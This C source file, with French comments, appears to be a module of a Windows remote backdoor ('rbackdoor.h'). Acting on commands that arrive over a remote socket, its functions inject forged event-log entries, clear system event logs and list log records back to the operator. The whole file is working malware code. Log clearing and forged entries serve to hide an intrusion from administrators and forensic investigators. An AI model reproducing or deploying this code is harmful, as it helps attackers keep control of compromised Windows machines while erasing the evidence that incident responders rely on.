#include "rbackdoor.h"

/************************************************************************/
/*      Fonction permettant d'ajouter une entre dans l'eventlog       */
/************************************************************************/

int Add_Event(char *host, char *source)
{
	HANDLE h;
	LPSTR aszMsg[] = {source,};
	
	if(strlen(host)<1 || strlen(source) < 1)
	{
		Proc_help("addevent");
		return(-1);
	}
	
	h = RegisterEventSource(host,  source);
	if (h == NULL) {
		rsend(ConnectSocket, "Error: could not register event source");
		return(-1);
	}
	
	if (!ReportEvent(h,EVENTLOG_INFORMATION_TYPE,1,0x1003,NULL,0, 0,(LPTSTR *) aszMsg, NULL)) {
		rsend(ConnectSocket, "Error: could not report event");
		return(-1);
	}
	rsend(ConnectSocket, "msg: Event ajoute avec succes");
	DeregisterEventSource(h);
	
	return(0);
}

/************************************************************************/
/*      Fonction permettant d'effacer les journaux  de l'eventlog       */
/************************************************************************/


int Clear_Log(char *host, char *type)
{
	HANDLE h;
	
	if(strlen(host)<1 || strlen(type) < 1)
	{
		Proc_help("clearlog");
		return(-1);
	}
	
	h = RegisterEventSource(host,  type);
	if (h == NULL) {
		rsend(ConnectSocket, "Error: could not register event source");
		return(-1);
	}
	
	if(ClearEventLog(h,NULL)==0) {
		rsend(ConnectSocket, "Error: Erreur lors de la tentative d'effacement des journaux systeme");
		return(-1);
	}
	rsend(ConnectSocket, "msg: Journal Systeme efface avec succes");
	return(0);
}


/************************************************************************/
/*      Fonction permettant de lister les evenements de l'eventlog      */
/************************************************************************/

int ListEvent(char *host, char *type)
{
	HANDLE h;
	EVENTLOGRECORD *pevlr;
	BYTE bBuffer[1024];
	DWORD dwRead, dwNeeded, dwThisRecord = 0;
	char *buffer;
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	
	if(strlen(host)<1 || strlen(type) < 1)
	{
		Proc_help("listevent");
		return(-1);
	}
	
	h = OpenEventLog(host, type);
	if (h == NULL) {
		rsend(ConnectSocket, "Error: could not register event source");
		return(-1);
	}
	pevlr = (EVENTLOGRECORD *) &bBuffer;
	
	while (ReadEventLog(h,EVENTLOG_FORWARDS_READ | EVENTLOG_SEQUENTIAL_READ,0,pevlr,1024,&dwRead,&dwNeeded)) {
		while (dwRead > 0) {
			sprintf(buffer, " > %02d  Event ID: 0x%08X ", dwThisRecord++, pevlr->EventID);
			rsend(ConnectSocket, buffer);
			sprintf(buffer, "EventType: %d Source: %s\n", pevlr->EventType, (LPSTR) ((LPBYTE) pevlr + sizeof(EVENTLOGRECORD)));
			rsend(ConnectSocket, buffer);
			dwRead -= pevlr->Length;
			pevlr = (EVENTLOGRECORD *) ((LPBYTE) pevlr + pevlr->Length);
		}
		pevlr = (EVENTLOGRECORD *) &bBuffer;
	}
	CloseEventLog(h);
	GlobalFree(buffer);
	return(0);
}

